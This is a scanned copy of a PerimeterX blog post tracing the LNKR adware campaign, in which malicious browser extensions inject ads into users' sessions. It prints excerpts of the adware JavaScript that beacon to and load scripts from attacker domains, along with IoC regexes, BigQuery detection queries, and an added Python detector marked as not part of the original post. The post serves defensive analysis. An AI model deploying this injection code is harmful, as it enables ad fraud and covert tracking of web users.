www.perimeterx.com
2400:6180:0:d1::611:8001
Public Scan
URL:
https://www.perimeterx.com/tech-blog/2020/the-missing-lnkr/
Submission: On January 14 via manual from JP — Scanned from JP
Text Content
THE MISSING LNKR

by Ben Baryo, October 22, 2020

How we connected several incidents our clients’ end-users experienced to a broad ad injection campaign spanning end-users across much of our customer base.

FIRST INCIDENTS

During a new integration of PerimeterX Code Defender in July, the customer alerted us that they had received complaints that several of their end users had experienced fraud after submitting payment details into their website. Our review of the code running on their website revealed nothing malicious.

We then used our visibility into their site and found a very small percentage of end users experiencing JavaScript injections which contacted unexpected domains. The small number of affected users made a Magecart attack unlikely, as those usually run on as many users as possible instead of a small subset, but we wanted to dot all the i’s and cross all the t’s to verify this wasn’t a more elaborate, targeted attack.

The unexpected domains we encountered, guxuladebu[.]com and wejekihota[.]com, were registered as recently as 04/2020 and were both tagged as high-risk by our domain intelligence provider. The scripts detected in the compromised sessions were injected into the payment iframe, and a close look at them revealed unobfuscated code, which included comments and full variable names. The scripts seemingly “only” inject ads and trackers into the page.

THE INITIAL ADWARE INJECTION

The opening lines of one of the injections:

    var alreadyLoadedMnz = true;
    try {
        if (typeof(alreadyLoadedFdzScript) == "undefined") {
            var euPlugin = true;
            var alreadyLoadedFdzScript = true;
            var mainPluginKey = "8kime1SUSnpFEB9EJs$JTA";
            var countryPlugin = "br";

The injected scripts, losudu.guxuladebu[.]com/scripts/js and fevoki.wejekihota[.]com/scripts/js, both use object and method names such as fdzAdsManager, fdzNativeAds, pushMoreProducts, and replaceAds, so it was easy to figure out what was going on: the script would seek out existing ad elements and iframes on the page - such as YouTube ads, Taboola, Ligatus or Outbrain - and replace them with its own ads.

    replaceAds: function (format, element) {
        return new Promise(function (resolve) {
            if (element.height > 200) {
                jKiri.getJSON(
                    dynamicURL('https://debezihe[.]wejekihota[.]com/assets/nataurl?width=' + element.width + '&height=' + element.height + '&h=' + btoa(document.location.host) + '&pk=' + mainPluginKey + '&callback=?'),
                    null,
                    function (json) {
                        if (json.url) {
                            if (jKiri('.native_adn').length >= fdzNativeAds.limit) {
                                return resolve();
                            }
                            if (!document.body.contains(element.item[0])) {
                                return resolve();
                            }
                            element.item.replaceWith(jKiri('<iframe class="native_adn" src="' + json.url + '" width="' + element.width + '" height="' + element.height + '" style="border:none;display:block;margin:auto" />'));
                            if (json.boost_type && json.boost_type == "ctz") {
                                fdzNativeAds.trackEvent("show", "native_ads_ctz", element.width + "x" + element.height, json.url);
                            } else if (json.boost_type && json.boost_type == "adthink") {
                                fdzNativeAds.trackEvent("show", "native_ads_adthink", element.width + "x" + element.height, json.url);
                            } else {
                                fdzNativeAds.trackEvent("show", "native_ads", element.width + "x" + element.height, json.url);
                            }
                            return resolve();
                        } else {
                            return resolve();
                        }
                    });
            } else {
                return resolve();
            }
        })
    }

It would read specific input fields, such as on Google’s shopping tab and other geo-specific sites (the scripts we first analyzed targeted French-speaking users) and inject ads based on the search query, with specific hardcoded categories such as flights and car rentals.

FSGROUP AND GOOGLE SEARCH RESULTS

These Fdz variables can be found on sites as early as 2017, but a more interesting find was the injection of another script from www.searchdirect[.]info/script/kr.php?uid=F248A67B54944A7A45101F4426CF894C&a=8383_ which starts by declaring a few unique variables:

    var fsgroup = "28";
    var trkid = '5f10493b02471';
    var uid = 'F248A67B54944A7A45101F4426CF894C';
    var affid = '8383';
    var dom = 'www.searchdirect[.]info';

This file is another piece of adware, which replaces Google’s search results with its own ads, based on a detected keyword in the query string. The script then fake-clicks its injected ads to generate revenue. It also tracks which ads are displayed on the page and injects beacon trackers.

ANOTHER INJECTION

Another suspicious injection was found to be hosted on Amazon’s AWS, at s3.amazonaws[.]com/jscache/19ff3cca12e47e3099.js, and was much noisier than the previous two:

    (function(f, i, j) {
        var g = "19ff3cca12e47e3099";
        var b = (function() {
            var l = 3;
            var p = parseInt("0");
            var o = parseInt("0");
            (function() {
                var r = ["mid=", "wid=52190", "sid=", "tid=6655", "rid=LAUNCHED"];
                a = (window.location.protocol == "http:" ? "http:" : "https:") + "//promlinkdev[.]com/metric/?" + r.join("&");
                var q = f.createElement("img");
                q.setAttribute("style", "width:0;height:0;display:none;visibility:hidden;");
                q.src = a + (a.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime());
                (document.head || document.documentElement).appendChild(q);
                if (typeof q.onload != j) {
                    q.onload = function() {
                        q.parentNode && q.parentNode.removeChild(q)
                    }
                }
            })();

It is minified, and includes among other things:

* Methods to report to C2 (Command & Control) and receive callback functions to run
* A hardcoded list of specific domains and TLDs not to inject to
  E.g. lotterysambadresult[.]in, paypal[.]com, anything [.]gov, etc…
* A hardcoded list of sites to inject specific banners to, most are in the Russian language
  E.g. mail[.]ru, rambler[.]ru, mysearch[.]com, securesurf[.]biz, etc...
* Static ads injections as iframes
* Injections of affiliation links
* Facebook injection
* Geolocation based injection allow and deny lists
* Redirection of searches to affiliated search engines
* Ability to inject nodes to input fields and textareas

Besides the fact that it’s much more robust and sophisticated than the previous injection, it once again loaded another script, www.findsearchresults[.]info/script/r.php?a=3200&uid=52190x0000xzzzzzzzzzzzzzzzzzzzzz, which turned out to be another fsgroup script, mostly identical to the last one:

    var fsgroup = "20";
    var trkid = '5f201f06995c8';
    var uid = '52190X0000XZZZZZZZZZZZZZZZZZZZZZ';
    var affid = '3200';
    var dom = 'www.findsearchresults[.]info';

UNDER THE RADAR

These injections were seen in a small percentage of end-users, and given the lack of evidence for the site being compromised, we assumed it must be a client-side injection, probably malware based, or a malicious browser extension. There was no further action to be taken.

THINGS ARE CLEARER THE SECOND TIME AROUND

A couple of days later, another incident surfaced. Though the offending injection originated from a domain tagged as high-risk, it was a match for the script injected from AWS: hardyload[.]com/22783aa0106c0e89f2.js

    (function(f, i, j) {
        var g = "22783aa0106c0e89f2";
        var b = (function() {
            var l = 3;
            var p = parseInt("0");
            var o = parseInt("0");
            (function() {
                var r = ["mid=", "wid=52658", "sid=", "tid=8824", "rid=LAUNCHED"];
                a = (window.location.protocol == "http:" ? "http:" : "https:") + "//hardyload[.]com/metric/?" + r.join("&");
                var q = f.createElement("img");
                q.setAttribute("style", "width:0;height:0;display:none;visibility:hidden;");
                q.src = a + (a.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime());
                (document.head || document.documentElement).appendChild(q);
                if (typeof q.onload != j) {
                    q.onload = function() {
                        q.parentNode && q.parentNode.removeChild(q)
                    }
                }
            })();

And just like the previous case, it also loaded the fsgroup script, this time from www.findsearchresults[.]info/script/r.php?a=...

Again, not many sessions displayed this injection and so this was considered to be another case of client-side malware / rogue extension.

CONNECTING THE DOTS

While there were two different initial injections, the one starting with alreadyLoadedMnz and the one with /metric/? in its path, both were adware and both injected the fsgroup script. The injections were also only witnessed in a relatively negligible number of sessions, but we were interested in knowing if this was perhaps a targeted attack against the customer’s users or a general case of client-side infection.

EXTRACTING IOCS

To better understand the spread of these injections, we extracted the following regexp IoCs:

* /script/js\?k=
* /metric/?\?mid=
  For both /metric/?mid= and /metric?mid=
* /optout/[gs]et
  For both /optout/get and /optout/set
* ^(https?:)?//[^/]+?/[a-f0-9]{18}\.js$
  Pretty generic, but surprisingly returns good results. A good way to remove false positives is to verify that both letters and numbers make up the filename.

IS IT JUST ME?

Armed with the IoCs, we searched across our customers for compromised end-users in the past week, and found:

* About 120 different domains with requests matching our IoCs
* Almost all of our Code Defender customers had compromised users visiting their sites
* The number of compromised users wasn’t significant compared to the number of overall visitors to the site

The numbers aren’t staggering to say the least, but from week to week they were consistent and everywhere.

The injections seem to be coming from either Chrome or Firefox browsers, and not from mobile devices, reaffirming our hypothesis that this was a case of malicious extension / client-side malware.

WHERE THINGS GOT INTERESTING

One of the tools we use during our investigations is HTTP Archive, which we usually search using Google’s BigQuery. We were wondering if perhaps we could find the injections somewhere else on the web.

We first looked for more occurrences of the injections we already had; perhaps finding them in context would yield new information? If they were indeed client-side injections, we expected not to find any matches. So we first searched for sites which communicate with the domains we had already seen:

    SELECT *
    FROM `httparchive.response_bodies.2020_08_01_desktop`
    WHERE REGEXP_CONTAINS(url, r'.*(guxuladebu\.com|wejekihota\.com|searchdirect\.info|findsearchresults\.info).*');

And surprisingly we found injections matching those we’ve seen! Not many, but we weren’t expecting to find any! We looked for more examples by searching for unique strings within the injections:

    SELECT *
    FROM `httparchive.response_bodies.2020_08_01_desktop`
    WHERE body LIKE '%/log/?l=error&m="%'
       OR body LIKE "var alreadyLoadedMnz%";

This yielded almost 300 results, from different sites, with the injected scripts coming from different domains, and with the request URLs all matching our IoCs. We got practically the same results when we searched for our IoCs with the following query:

    SELECT DISTINCT page
    FROM `httparchive.requests.2020_08_01_desktop`
    WHERE (REGEXP_CONTAINS(url, r'^(https?):?//[^/]+?/[a-f0-9]{18}\.js$')
           AND NOT REGEXP_CONTAINS(url, r'^(https?):?//[^/]+?/[0-9]{18}\.js$')
           AND NOT REGEXP_CONTAINS(url, r'^(https?):?//[^/]+?/[a-f]{18}\.js$'))
       OR REGEXP_CONTAINS(url, r'.*(/script/js\?k=|/optout/[gs]et).*');

Why would what we thought was a client-side injection be embedded into sites?

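The regexp IoCs from EXTRACTING IOCS, applied to request URLs with the letters-and-digits filter that the last query above expresses through its two AND NOT clauses. This is an added example, not code from the original post or from PerimeterX; the function names, the (page, request URL) record shape and the .example hosts are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Regexp IoCs exactly as listed in the article.
PATH_IOCS = {
    "script_js": re.compile(r"/script/js\?k="),
    "metric": re.compile(r"/metric/?\?mid="),   # /metric/?mid= and /metric?mid=
    "optout": re.compile(r"/optout/[gs]et"),    # /optout/get and /optout/set
}
# The generic 18-character hex file name; the group captures the file stem.
HEX18_JS = re.compile(r"^(https?:)?//[^/]+?/([a-f0-9]{18})\.js$")


def classify(url):
    """Return the names of the IoCs that a request URL matches."""
    hits = [name for name, rx in PATH_IOCS.items() if rx.search(url)]
    m = HEX18_JS.match(url)
    if m:
        stem = m.group(2)
        # False-positive filter from the article: the file name must mix
        # letters and digits, so all-digit and all-letter names are dropped.
        if any(c.isdigit() for c in stem) and any(c.isalpha() for c in stem):
            hits.append("hex18_js")
    return hits


def summarize(requests):
    """Group IoC hits by the page that issued the request and by the
    host that served it. `requests` is an iterable of (page, url)."""
    pages = defaultdict(set)
    hosts = defaultdict(set)
    for page, url in requests:
        for name in classify(url):
            pages[page].add(name)
            hosts[urlsplit(url).hostname].add(name)
    return {
        "pages": {p: sorted(v) for p, v in pages.items()},
        "hosts": {h: sorted(v) for h, v in hosts.items()},
    }


# Constructed sample records (page, request URL); none are real indicators.
SAMPLE_REQUESTS = [
    ("https://shop.example/checkout",
     "https://cdn.injected.example/22aa0106c0e89f2b71.js"),
    ("https://shop.example/checkout",
     "https://cdn.injected.example/metric/?mid=&wid=1&sid=&tid=2&rid=LAUNCHED"),
    ("https://shop.example/checkout",
     "https://static.shop.example/app.js"),
    # 18 characters but digits only, and letters only: both filtered out.
    ("https://shop.example/cart",
     "https://static.shop.example/123456789012345678.js"),
    ("https://shop.example/cart",
     "https://static.shop.example/abcdefabcdefabcdef.js"),
    ("https://news.example/",
     "https://tags.injected.example/optout/set/lat"),
    ("https://news.example/",
     "https://data1.injected.example/script/js?k=constructed"),
]

if __name__ == "__main__":
    report = summarize(SAMPLE_REQUESTS)
    for page, names in report["pages"].items():
        print(page, "->", ", ".join(names))
    for host, names in report["hosts"].items():
        print(host, "->", ", ".join(names))
```
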
THE MISSING LNKR

Intrigued, we looked further into the domains involved, and found that one of them, cdnapps[.]us, was registered with the email frankomedison1020@gmail.com. A quick Google search led us to a KrebsOnSecurity blog entry from March 2020 which described a situation similar to the one we started with, attributed to malicious extensions. The extensions might not have started out malicious but were later sold to new owners who turned them into adware.

Krebs goes on to suggest how sites came to be embedded with the same injections: the sites were edited in-browser while a malicious extension was running in the background, which resulted in malicious code being injected into the pages during the online edit.

A more recent blog entry from Netskope refers to this as a LNKR campaign, named after a string found in its earlier iterations back in 2016. A security researcher named Paul Buonopane described the LNKR injections, gave several IoCs, and also analyzed a fake extension which was a copy of a legit extension with the malicious injections appended to it.

WHAT DO YOU MEAN IT’S ALREADY TAKEN CARE OF?

Now that we had a firmer grasp of what our customers were facing, we knew where to look for guarding against an extension injecting into the session: PerimeterX Page Defender. As it turned out, all of our Page Defender customers were already covered, as any request matching one of the IoCs was already spotted and blocked.

TO CONCLUDE

We hope that sharing our journey from the first incident to the identification of the threat and finding the right tool for remediation will give you insight into the way we look at threats. At PerimeterX we research different web threats, from hacked servers, through compromised 3rd-party vendors, to client-side injections. Owing to that we were able to connect the dots and quickly identify the solution - Page Defender, which already blocks the malicious extensions from interfering with the session.
Our products sharing a platform means we can leverage intel and capabilities for quick deployment of solutions.

BUT WHAT CAN YOU DO AS AN END-USER?

As obvious as it may sound, it’s important to stay cautious and look for warning signs when downloading extensions. If at any time you notice changes in your browsing experience (unexpected ads, links being added, etc...) you should review the extensions installed on your browser, perhaps turning them off one at a time to identify the culprit, and consider uninstalling those which are no longer relevant.

ADDENDUM: ADWARE URLS

Though not exhaustive, this list includes more than 350 URLs which matched the IoCs mentioned above. We wanted to include just the domains at first, but since not all of these domains are inherently malicious (as is the case of amazonaws[.]com), the domain + path can be used to detect the existence of this adware in the network.